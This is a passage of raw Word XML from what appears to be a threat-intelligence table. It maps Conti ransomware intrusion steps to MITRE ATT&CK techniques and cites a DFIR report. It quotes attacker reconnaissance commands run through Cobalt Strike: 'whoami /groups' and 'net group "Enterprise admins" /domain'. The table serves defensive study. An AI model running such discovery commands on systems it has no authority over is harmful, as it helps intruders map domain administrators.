          <w:p w14:paraId="0C071994" w14:textId="419A645C" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007E2AFE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="076D0049" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="00B857D7" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB0B45D" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4504530D" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E694899" w14:textId="77777777" w:rsidR="006C7AF5" w:rsidRDefault="00F15272" w:rsidP="006C7AF5">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="006C7AF5">
              <w:t xml:space="preserve">cmd.exe /C </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="006C7AF5">
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006C7AF5">
              <w:t xml:space="preserve"> /groups</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F2F44F" w14:textId="58131482" w:rsidR="00F15272" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>via</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Cobalt Strike). See below</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70936BB0" w14:textId="77777777" w:rsidR="00F15272" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003227C3" w:rsidRPr="00B857D7" w14:paraId="1C094DA7" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E2F92AD" w14:textId="47F5103F" w:rsidR="003227C3" w:rsidRDefault="0022017D" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0022017D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="221AB74A" w14:textId="4CCA3118" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>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75F64D73" w14:textId="7FA1F1E1" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1033 System Owner/User Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05061E21" w14:textId="04303DED" w:rsidR="003227C3" w:rsidRPr="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007E2AFE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56BE9A73" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69380C09" w14:textId="779B7A66" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2632A271" w14:textId="5BC30DE7" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F8E9579" w14:textId="1FE40A7B" w:rsidR="003227C3" w:rsidRPr="00D11489" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15272" w:rsidRPr="00B857D7" w14:paraId="7E03DCE1" w14:textId="77777777" w:rsidTr="006351CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EDF9F84" w14:textId="7FD6A300" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="0022017D" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F760D2" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="044A3847" w14:textId="3C3DC92A" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15272">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F15272">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E5DA30F" w14:textId="2A46C5E2" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="007E2AFE" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594530D1" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="00B857D7" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E6EAEDF" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07377EE7" w14:textId="77777777" w:rsidR="00F15272" w:rsidRPr="004A56C2" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="770C07E1" w14:textId="4C5A193A" w:rsidR="00F15272" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00B7413C" w:rsidRPr="00B7413C">
              <w:t xml:space="preserve">cmd.exe /C net group "Enterprise admins" /domain </w:t>
            </w:r>
            <w:r>
              <w:t>(via Cobalt Strike). See below</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23974A23" w14:textId="77777777" w:rsidR="00F15272" w:rsidRDefault="00F15272" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003227C3" w:rsidRPr="00B857D7" w14:paraId="0A211659" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BE09DB0" w14:textId="45C32C16" w:rsidR="003227C3" w:rsidRPr="0022017D" w:rsidRDefault="0022017D" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0022017D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="730E7307" w14:textId="4CF94848" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C5FCAC2" w14:textId="27893F8D" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1135 Network Share Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F227A7" w14:textId="1E068C5D" w:rsidR="003227C3" w:rsidRDefault="007E2AFE" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E2AFE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51E80DD4" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E6767E4" w14:textId="73CFC276" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7009628D" w14:textId="1234E188" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3316BB6D" w14:textId="71AF0228" w:rsidR="003227C3" w:rsidRPr="00D11489" w:rsidRDefault="003227C3" w:rsidP="003227C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003227C3" w:rsidRPr="00B857D7" w14:paraId="573A218A" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F4439FB" w14:textId="77777777" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27713637" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D39A257" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6715AC95" w14:textId="77777777" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="458ACD2F" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78EE63FB" w14:textId="77777777" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C7E8134" w14:textId="77777777" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C2F8CD2" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00D11489" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003227C3" w:rsidRPr="00B857D7" w14:paraId="25A1DA1C" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6798AFDF" w14:textId="77777777" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="679FDD9E" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B05EDE8" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D84D29F" w14:textId="77777777" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B90E29F" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00B857D7" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6052C4D4" w14:textId="77777777" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6255D567" w14:textId="77777777" w:rsidR="003227C3" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E8A8D6" w14:textId="77777777" w:rsidR="003227C3" w:rsidRPr="00D11489" w:rsidRDefault="003227C3" w:rsidP="00FC027E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33EEFB44" w14:textId="77777777" w:rsidR="00DD1FAC" w:rsidRPr="0077286F" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC"/>
    <w:p w14:paraId="749D73DE" w14:textId="5772F4B2" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702243FA" w14:textId="72CB3C77" w:rsidR="00DD1FAC" w:rsidRDefault="00DD1FAC" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId200" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Conti Ransomware (thedfirreport.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AEBED2" w14:textId="204630D0" w:rsidR="00DD1FAC" w:rsidRDefault="005C6F88" w:rsidP="00DD1FAC">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId201" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
